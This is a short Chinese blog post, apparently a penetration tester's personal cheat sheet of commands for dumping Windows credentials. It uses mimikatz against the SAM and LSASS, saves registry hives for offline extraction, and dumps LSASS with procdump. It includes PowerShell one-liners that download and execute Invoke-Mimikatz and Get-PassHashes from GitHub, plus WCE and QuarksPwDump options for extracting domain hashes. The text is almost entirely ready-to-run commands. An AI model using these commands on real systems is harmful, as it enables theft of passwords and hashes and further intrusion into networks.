网上很多人都整理了,我渗透手册上面也有不少,但是都记不住,我自己写一次,应该能加深印象的。

mimikatz with reg (online)

mimikatz # privilege::debug
mimikatz # token::elevate
mimikatz # lsadump::sam

mimikatz with reg (offline)

reg save HKLM\SYSTEM SystemBkup.hiv
reg save HKLM\SAM SamBkup.hiv
mimikatz # lsadump::sam /system:SystemBkup.hiv /sam:SamBkup.hiv

mimikatz with procdump

procdump64.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonPasswords full

mimikatz with powershell

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Invoke-Mimikatz.ps1');Invoke-Mimikatz

GetHashs with powershell

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-PassHashes.ps1‘);Get-PassHashes

WCE

wce.exe -l

QuarksPwDump

导出当前域内所有用户hash的技术整理
http://wooyun.jozxing.cc/static/drops/tips-6617.html
Options :
-k --get-system-key
-dhl --dump-hash-local
-dhdc --dump-hash-domain-cached
-dhd --dump-hash-domain (NTDS_FILE must be specified)
-db --dump-bitlocker (NTDS_FILE must be specified)
-sf --system-file FILE
-sk --system-key KEY
-nt --ntds-file FILE
-hist --with-history (optional)
-t --output-type JOHN/LC (optional, if no=>JOHN)
-o --output FILE (optional, if no=>stdout)
Example: quarks-pwdump.exe --dump-hash-domain --with-history
quarks-pwdump.exe -dhl

闪电小子 GetPassword

发表评论

电子邮件地址不会被公开。 必填项已用*标注